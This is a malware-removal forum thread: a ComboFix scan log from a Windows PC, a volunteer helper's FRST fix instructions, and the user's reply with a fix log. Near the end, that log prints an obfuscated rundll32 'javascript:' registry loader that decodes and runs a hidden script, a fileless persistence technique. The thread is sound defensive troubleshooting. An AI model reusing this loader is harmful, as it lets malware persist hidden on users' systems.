2014-05-30 07:49 . 2014-06-11 11:33 1964544 ----a-w- c:\windows\SysWow64\inetcpl.cpl
2014-05-30 07:43 . 2014-06-11 11:33 13522944 ----a-w- c:\windows\system32\ieframe.dll
2014-05-30 07:30 . 2014-06-11 11:33 1398272 ----a-w- c:\windows\system32\urlmon.dll
2014-05-30 07:21 . 2014-06-11 11:33 1790976 ----a-w- c:\windows\SysWow64\wininet.dll
2014-05-30 07:13 . 2014-06-11 11:33 846336 ----a-w- c:\windows\system32\ieapfltr.dll
2014-05-09 06:14 . 2014-05-14 13:38 477184 ----a-w- c:\windows\system32\aepdu.dll
2014-05-09 06:11 . 2014-05-14 13:38 424448 ----a-w- c:\windows\system32\aeinv.dll
2014-05-08 09:32 . 2014-06-11 11:32 3178496 ----a-w- c:\windows\system32\rdpcorets.dll
2014-05-08 09:32 . 2014-06-11 11:32 16384 ----a-w- c:\windows\system32\RdpGroupPolicyExtension.dll
2014-04-25 02:34 . 2014-06-11 11:32 801280 ----a-w- c:\windows\system32\usp10.dll
2014-04-25 02:06 . 2014-06-11 11:32 626688 ----a-w- c:\windows\SysWow64\usp10.dll
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\Carbonite.Green]
@="{95A27763-F62A-4114-9072-E81D87DE3B68}"
[HKEY_CLASSES_ROOT\CLSID\{95A27763-F62A-4114-9072-E81D87DE3B68}]
2012-08-29 18:51 1014344 ----a-r- c:\program files (x86)\Carbonite\Carbonite Backup\CarboniteNSE.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\Carbonite.Partial]
@="{E300CD91-100F-4E67-9AF3-1384A6124015}"
[HKEY_CLASSES_ROOT\CLSID\{E300CD91-100F-4E67-9AF3-1384A6124015}]
2012-08-29 18:51 1014344 ----a-r- c:\program files (x86)\Carbonite\Carbonite Backup\CarboniteNSE.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\Carbonite.Yellow]
@="{5E529433-B50E-4bef-A63B-16A6B71B071A}"
[HKEY_CLASSES_ROOT\CLSID\{5E529433-B50E-4bef-A63B-16A6B71B071A}]
2012-08-29 18:51 1014344 ----a-r- c:\program files (x86)\Carbonite\Carbonite Backup\CarboniteNSE.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-11 02:09 131248 ----a-w- c:\users\Ric\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-11 02:09 131248 ----a-w- c:\users\Ric\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-11 02:09 131248 ----a-w- c:\users\Ric\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"{90140000-003D-0000-1000-0000000FF1CE}"="del" [X]
.
c:\users\Ric\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Dropbox.lnk - c:\users\Ric\AppData\Roaming\Dropbox\bin\Dropbox.exe /systemstartup [2014-5-19 33322312]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
"EnableLinkedConnections"= 1 (0x1)
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS]
@=""
.
R0 xnvdb;xnvdb;c:\windows\System32\drivers\cixf.sys;c:\windows\SYSNATIVE\drivers\cixf.sys [x]
R1 qnmokglx;qnmokglx;c:\windows\system32\drivers\qnmokglx.sys;c:\windows\SYSNATIVE\drivers\qnmokglx.sys [x]
R1 smvowoli;smvowoli;c:\windows\system32\drivers\smvowoli.sys;c:\windows\SYSNATIVE\drivers\smvowoli.sys [x]
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
R2 RoxWatch12;Roxio Hard Drive Watcher 12;c:\program files (x86)\Common Files\Roxio Shared\13.0\SharedCOM\RoxWatch13.exe;c:\program files (x86)\Common Files\Roxio Shared\13.0\SharedCOM\RoxWatch13.exe [x]
R3 btusbflt;Bluetooth USB Filter;c:\windows\system32\drivers\btusbflt.sys;c:\windows\SYSNATIVE\drivers\btusbflt.sys [x]
R3 BVRPMPR5a64;BVRPMPR5a64 NDIS Protocol Driver;c:\windows\system32\drivers\BVRPMPR5a64.SYS;c:\windows\SYSNATIVE\drivers\BVRPMPR5a64.SYS [x]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe;c:\windows\SYSNATIVE\IEEtwCollector.exe [x]
R3 McComponentHostService;McAfee Security Scan Component Host Service;c:\program files\McAfee Security Scan\3.8.150\McCHSvc.exe;c:\program files\McAfee Security Scan\3.8.150\McCHSvc.exe [x]
R3 Netaapl;Apple Mobile Device Ethernet Service;c:\windows\system32\DRIVERS\netaapl64.sys;c:\windows\SYSNATIVE\DRIVERS\netaapl64.sys [x]
R3 ose64;Office 64 Source Engine;c:\program files\Common Files\Microsoft Shared\Source Engine\OSE.EXE;c:\program files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [x]
R3 qrkis;Tether Miniport;c:\windows\system32\DRIVERS\qrkis.sys;c:\windows\SYSNATIVE\DRIVERS\qrkis.sys [x]
R3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys;c:\windows\SYSNATIVE\drivers\rdpvideominiport.sys [x]
R3 RoxMediaDB13;RoxMediaDB13;c:\program files (x86)\Common Files\Roxio Shared\13.0\SharedCOM\RoxMediaDB13.exe;c:\program files (x86)\Common Files\Roxio Shared\13.0\SharedCOM\RoxMediaDB13.exe [x]
R3 SwitchBoard;Adobe SwitchBoard;c:\program files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe;c:\program files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys;c:\windows\SYSNATIVE\drivers\tsusbflt.sys [x]
R3 TurboBoost;TurboBoost;c:\program files\Intel\TurboBoost\TurboBoost.exe;c:\program files\Intel\TurboBoost\TurboBoost.exe [x]
R3 USBAAPL64;Apple Mobile USB Driver;c:\windows\system32\Drivers\usbaapl64.sys;c:\windows\SYSNATIVE\Drivers\usbaapl64.sys [x]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x]
R4 wlcrasvc;Windows Live Mesh remote connections service;c:\program files\Windows Live\Mesh\wlcrasvc.exe;c:\program files\Windows Live\Mesh\wlcrasvc.exe [x]
S0 PxHlpa64;PxHlpa64;c:\windows\System32\Drivers\PxHlpa64.sys;c:\windows\SYSNATIVE\Drivers\PxHlpa64.sys [x]
S0 Sahdad64;HDD Filter Driver;c:\windows\System32\Drivers\Sahdad64.sys;c:\windows\SYSNATIVE\Drivers\Sahdad64.sys [x]
S0 Saibad64;Volume Filter Driver;c:\windows\System32\Drivers\Saibad64.sys;c:\windows\SYSNATIVE\Drivers\Saibad64.sys [x]
S1 SaibVdAd64;Virtual Disk Driver;c:\windows\system32\Drivers\SaibVdAd64.sys;c:\windows\SYSNATIVE\Drivers\SaibVdAd64.sys [x]
S2 9734BF6A-2DCD-40f0-BAB0-5AAFEEBE1269;Roxio SAIB Service;c:\program files (x86)\Roxio\BackOnTrack\App\SaibSVC.exe;c:\program files (x86)\Roxio\BackOnTrack\App\SaibSVC.exe [x]
S2 AESTFilters;Andrea ST Filters Service;c:\windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_0057cbec48a2d7cf\AESTSr64.exe;c:\windows\SYSNATIVE\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_0057cbec48a2d7cf\AESTSr64.exe [x]
S2 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe;c:\windows\SYSNATIVE\atiesrxx.exe [x]
S2 BcmBtRSupport;Bluetooth Driver Management Service;c:\windows\system32\BtwRSupportService.exe;c:\windows\SYSNATIVE\BtwRSupportService.exe [x]
S2 BOT4Service;BOT4Service;c:\program files (x86)\Roxio\BackOnTrack\App\BService.exe;c:\program files (x86)\Roxio\BackOnTrack\App\BService.exe [x]
S2 Fitbit Connect;Fitbit Connect Service;c:\program files (x86)\Fitbit Connect\FitbitConnectService.exe;c:\program files (x86)\Fitbit Connect\FitbitConnectService.exe [x]
S2 IAStorDataMgrSvc;Intel® Rapid Storage Technology;c:\program files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe;c:\program files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [x]
S2 PCPitstop Scheduling;PCPitstop Scheduling;c:\program files (x86)\PCPitstop\PCPitstopScheduleService.exe;c:\program files (x86)\PCPitstop\PCPitstopScheduleService.exe [x]
S2 QDLService2kDell;Qualcomm Gobi 2000 Download Service (Dell);c:\program files (x86)\QUALCOMM\QDLService2k\QDLService2kDell.exe;c:\program files (x86)\QUALCOMM\QDLService2k\QDLService2kDell.exe [x]
S2 rimspci;rimspci;c:\windows\system32\DRIVERS\rimspe64.sys;c:\windows\SYSNATIVE\DRIVERS\rimspe64.sys [x]
S2 risdpcie;risdpcie;c:\windows\system32\DRIVERS\risdpe64.sys;c:\windows\SYSNATIVE\DRIVERS\risdpe64.sys [x]
S2 rixdpcie;rixdpcie;c:\windows\system32\DRIVERS\rixdpe64.sys;c:\windows\SYSNATIVE\DRIVERS\rixdpe64.sys [x]
S2 TurboB;Turbo Boost UI Monitor driver;c:\windows\system32\DRIVERS\TurboB.sys;c:\windows\SYSNATIVE\DRIVERS\TurboB.sys [x]
S2 WMCoreService;Mobile Broadband Service;c:\program files (x86)\Dell\Dell WWAN\WMCore\mini_WMCore.exe servicemode;c:\program files (x86)\Dell\Dell WWAN\WMCore\mini_WMCore.exe servicemode [x]
S3 bcbtums;Bluetooth USB LD Filter;c:\windows\system32\drivers\bcbtums.sys;c:\windows\SYSNATIVE\drivers\bcbtums.sys [x]
S3 btwampfl;btwampfl;c:\windows\system32\DRIVERS\btwampfl.sys;c:\windows\SYSNATIVE\DRIVERS\btwampfl.sys [x]
S3 btwl2cap;Bluetooth L2CAP Service;c:\windows\system32\DRIVERS\btwl2cap.sys;c:\windows\SYSNATIVE\DRIVERS\btwl2cap.sys [x]
S3 CtClsFlt;Creative Camera Class Upper Filter Driver;c:\windows\system32\DRIVERS\CtClsFlt.sys;c:\windows\SYSNATIVE\DRIVERS\CtClsFlt.sys [x]
S3 ITECIRfilter;ITECIR Filter Driver;c:\windows\system32\DRIVERS\ITECIRfilter.sys;c:\windows\SYSNATIVE\DRIVERS\ITECIRfilter.sys [x]
S3 k57nd60a;Broadcom NetLink ™ Gigabit Ethernet - NDIS 6.0;c:\windows\system32\DRIVERS\k57nd60a.sys;c:\windows\SYSNATIVE\DRIVERS\k57nd60a.sys [x]
S3 netw5v64;Intel® Wireless WiFi Link 5000 Series Adapter Driver for Windows Vista 64 Bit;c:\windows\system32\DRIVERS\netw5v64.sys;c:\windows\SYSNATIVE\DRIVERS\netw5v64.sys [x]
.
.
--- Other Services/Drivers In Memory ---
.
*NewlyCreated* - WS2IFSL
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2014-06-16 13:09 1091912 ----a-w- c:\program files (x86)\Google\Chrome\Application\35.0.1916.153\Installer\chrmstp.exe
.
Contents of the 'Scheduled Tasks' folder
.
2014-07-17 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2012-03-31 23:36]
.
2014-07-17 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2013-10-06 18:24]
.
2014-07-17 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2013-10-06 18:24]
.
2014-07-14 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-3536542363-2189832666-3084334477-1001Core.job
- c:\users\Ric\AppData\Local\Google\Update\GoogleUpdate.exe [2011-08-28 15:40]
.
2014-07-17 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-3536542363-2189832666-3084334477-1001UA.job
- c:\users\Ric\AppData\Local\Google\Update\GoogleUpdate.exe [2011-08-28 15:40]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\Carbonite.Green]
@="{95A27763-F62A-4114-9072-E81D87DE3B68}"
[HKEY_CLASSES_ROOT\CLSID\{95A27763-F62A-4114-9072-E81D87DE3B68}]
2012-08-29 18:43 1284168 ----a-r- c:\program files\Carbonite\Carbonite Backup\CarboniteNSE.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\Carbonite.Partial]
@="{E300CD91-100F-4E67-9AF3-1384A6124015}"
[HKEY_CLASSES_ROOT\CLSID\{E300CD91-100F-4E67-9AF3-1384A6124015}]
2012-08-29 18:43 1284168 ----a-r- c:\program files\Carbonite\Carbonite Backup\CarboniteNSE.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\Carbonite.Yellow]
@="{5E529433-B50E-4bef-A63B-16A6B71B071A}"
[HKEY_CLASSES_ROOT\CLSID\{5E529433-B50E-4bef-A63B-16A6B71B071A}]
2012-08-29 18:43 1284168 ----a-r- c:\program files\Carbonite\Carbonite Backup\CarboniteNSE.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-11 02:09 164016 ----a-w- c:\users\Ric\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-11 02:09 164016 ----a-w- c:\users\Ric\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-11 02:09 164016 ----a-w- c:\users\Ric\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt4]
@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-11 02:09 164016 ----a-w- c:\users\Ric\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
------- Supplementary Scan -------
.
uLocal Page = c:\windows\system32\blank.htm
uStart Page = about:blank
uDefault_Search_URL = hxxp://www.google.com/ie
mLocal Page = c:\windows\SysWOW64\blank.htm
uInternet Settings,ProxyOverride = *.local
uSearchAssistant = hxxp://www.google.com/ie
uSearchURL,(Default) = hxxp://www.google.com/search?q=%s
IE: Add to Google Photos Screensa&ver - c:\windows\system32\GPhotos.scr/200
IE: E&xport to Microsoft Excel - c:\progra~1\MICROS~1\Office14\EXCEL.EXE/3000
IE: Se&nd to OneNote - c:\progra~1\MICROS~1\Office14\ONBttnIE.dll/105
IE: Send image to &Bluetooth Device... - c:\program files\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
IE: Send page to &Bluetooth Device... - c:\program files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
Trusted Zone: dell.com
.
- - - - ORPHANS REMOVED - - - -
.
SafeBoot-51887692.sys
HKLM_Wow6432Node-ActiveSetup-{2D46B6DC-2207-486B-B523-A557E6D54B47} - start
AddRemove-centurytoolbar - c:\program files (x86)\centurytoolbar\uninstall.exe
.
.
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-3536542363-2189832666-3084334477-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32\*]
@Allowed: (B 1 4 5 6) (S-1-5-5-0-303777)
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_14_0_0_145_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\LocalServer32]
@="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_14_0_0_145_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="IFlashBroker5"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_14_0_0_145_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\LocalServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_14_0_0_145_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_14_0_0_145.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.14"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_14_0_0_145.ocx, 1"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_14_0_0_145.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_14_0_0_145.ocx, 1"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="IFlashBroker5"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\software\McAfee]
"SymbolicLinkValue"=hex(6):5c,00,72,00,65,00,67,00,69,00,73,00,74,00,72,00,79,
   00,5c,00,6d,00,61,00,63,00,68,00,69,00,6e,00,65,00,5c,00,53,00,6f,00,66,00,\
.
------------------------ Other Running Processes ------------------------
.
c:\program files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
c:\program files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
c:\program files (x86)\ATI\Catalyst Media Center\Kernel\TV\CLCapSvc.exe
c:\program files (x86)\ATI\Catalyst Media Center\Kernel\CLML_NTService\CLMLServer.exe
c:\program files (x86)\Canon\IJPLM\IJPLMSVC.EXE
c:\program files (x86)\Dell\Dell WWAN\WMCore\mini_WMCore.exe
c:\program files (x86)\Intel\Intel Matrix Storage Manager\IAANTMon.exe
c:\program files (x86)\ATI\Catalyst Media Center\Kernel\TV\CLSched.exe
c:\windows\syswow64\dllhost.exe
.
**************************************************************************
.
Completion time: 2014-07-16  22:08:13 - machine was rebooted
ComboFix-quarantined-files.txt  2014-07-17 02:08
.
Pre-Run: 288,945,627,136 bytes free
Post-Run: 289,057,746,944 bytes free
.
- - End Of File - - D99C0E583B6D1821177A35704A931AA0
A36C5E4F47E84449FF07ED3517B43A31



#6 aharonov

  • Malware Response Team

Posted 17 July 2014 - 02:35 AM

Hi there,

let's do this:


Step 1

Please download this attached file, fixlist.txt (252 bytes), and save it in the same directory as FRST.
  • Start FRST with Administrator privileges.
  • Press the Fix button.
  • When finished, a log file (Fixlog.txt) pops up and is saved to the same location the tool was run from.
    Please copy and paste its contents in your next reply.


Step 2

Run Combofix again. But this time don't unplug the network beforehand but leave the system in the "normal" state with all those 'COM Surrogates' running so that Combofix can fully 'witness' the symptoms as you call it. :)

#7 scooter2028

  • Topic Starter

Posted 17 July 2014 - 09:15 AM

Many thanks for your help on this.

 

Here're the results.  They are almost what you asked for.

 

STEP 1

Ran FRST with fixlist.txt EXACTLY as you specified. 

 

STEP 2

Then ran Combofix.exe.  However, when it finished there were no 'Surrogate' processes running.  I assumed FRST had killed them.

 

STEP 3

Renamed ComboFix log to preserve it.

I brought up Task Manager, made sure some 'Surrogates' were running and started Combofix.exe again.

The 'Surrogates' went away immediately.  I have never seen this behavior before.  Somewhere during the run the task manager went away too.

I assume ComboFix was killing these tasks.

 

So below are 3 listings:

1. FRST Log

2. ComboFix - probably started without 'Surrogates'

3. ComboFix - with 'Surrogates' running when started but not shortly thereafter.

 

 

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 15-07-2014 01
Ran by Ric at 2014-07-17 08:41:24 Run:1
Running from C:\Users\Ric\Desktop
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
REG: reg query "HKU\S-1-5-21-3536542363-2189832666-3084334477-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" /s
ListPermissions: HKEY_USERS\S-1-5-21-3536542363-2189832666-3084334477-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
*****************

========= reg query "HKU\S-1-5-21-3536542363-2189832666-3084334477-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" /s =========

HKEY_USERS\S-1-5-21-3536542363-2189832666-3084334477-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32
    (Default)    REG_SZ    rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18:b9e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))
    a    REG_SZ    [encoded script data omitted]
